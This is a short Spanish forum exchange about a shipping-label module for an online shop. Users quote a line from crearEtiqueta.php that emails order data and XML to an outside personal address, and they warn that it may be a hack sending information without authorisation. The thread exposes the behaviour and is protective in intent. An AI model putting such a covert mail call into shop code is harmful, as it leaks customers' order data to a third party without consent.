Si que parece que hay algo en crearEtiqueta.php:
mail("juan@SUPRIMIDO", $datos['pedido'], $xml);
$nombreXml = $datosMerchant['franquicia'].'
_'.$datosMerchant['cit'].'_'.date('dmYHi').'.xml';
Revisar por si es un hack del módulo con feas intenciones.
Cuidado con este módulo el otro dia lei en Twitter que enviaba informacion sin autorización a un mail, decian que era juan@ algo .es si alguien lo tienes que mire si es verdad... vere si encuentro la info de nuevo en twitter